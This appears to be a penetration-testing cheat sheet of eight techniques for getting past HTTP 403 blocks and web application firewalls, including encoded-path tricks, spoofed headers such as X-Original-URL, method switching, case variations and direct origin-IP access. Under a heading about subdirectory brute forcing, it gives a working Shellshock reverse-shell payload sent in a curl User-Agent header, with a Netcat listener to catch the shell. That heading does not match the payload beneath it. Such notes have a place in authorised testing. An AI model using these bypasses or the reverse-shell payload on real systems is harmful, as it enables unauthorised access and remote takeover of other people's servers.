Technique 1: URL Manipulation
- Appending Encoded Characters:
- Use
%2e
(.) or%2f
(/) after the first slash in the URL to manipulate path traversal.- Example URLs:
https://www.domain/DB
→ 403https://www.domain/%2e/DB
→ 200https://www.domain/./DB
→ 200
- Example URLs:
- Use
Technique 2: Header Modification
- Adding Custom Headers to Requests:
- Include specific headers in your request to bypass restrictions:
Content-Length: 0
X-rewrite-url
X-Original-URL
X-Custom-IP-Authorization
X-Forwarded-For
- Include specific headers in your request to bypass restrictions:
Technique 3: Change Request Method
- Method Alteration:
- Change the HTTP method used in requests:
GET
→POST
GET
→TRACE
GET
→PUT
GET
→OPTIONS
- Change the HTTP method used in requests:
Technique 4: Using Curl
- Curl Command:
- Use Curl to send a request with modified headers:
curl -i -s -k -X 'GET' -H 'Host: account.domain.com' -H 'X-rewrite-url: admin/login' 'https://account.domain.com/'
- Use Curl to send a request with modified headers:
Technique 5: Brute Forcing Subdirectories
- Subdirectory Enumeration:
- Brute force subdirectories from the restricted area:
- Utilize tools like
dirb
with a wordlist (e.g.,common.txt
). - Set up a Netcat listener.
- Inject parameters using Curl or Burp Suite:
- Curl Example:
curl -A "() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1" http://192.168.2.18/cgi-bin/helloworld.cgi
- Burp Suite Example:
- Change User-Agent:
() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1
- Curl Example:
- Further Information: Shellshock Attack (opens in a new tab)
- Utilize tools like
- Brute force subdirectories from the restricted area:
Technique 6: Spelling Variations
- Changing URL Spelling:
- Attempt variations in the URL spelling to evade detection:
- Examples:
ww2.example.com/admin
www.example.com/ADMIN
www.example.com/aDmin
- Examples:
- Attempt variations in the URL spelling to evade detection:
Technique 7: Direct IP Access
- Accessing via IP Address:
- Bypass WAF by accessing the server directly through its IP address instead of the domain:
- Use tools like Security Trails (opens in a new tab) for historical IP data.
- Perform DNS queries to obtain the server's origin IP.
- Consider firewalls in front of the server.
- Bypass WAF by accessing the server directly through its IP address instead of the domain:
Technique 8: Adjust Injection Formula
- Modifying Injection Techniques:
- Experiment with different injection formulas to determine if any bypasses the WAF.